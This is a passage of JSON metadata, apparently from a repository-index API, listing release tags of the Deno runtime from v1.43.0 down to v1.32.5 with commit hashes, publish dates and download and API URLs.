ependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/den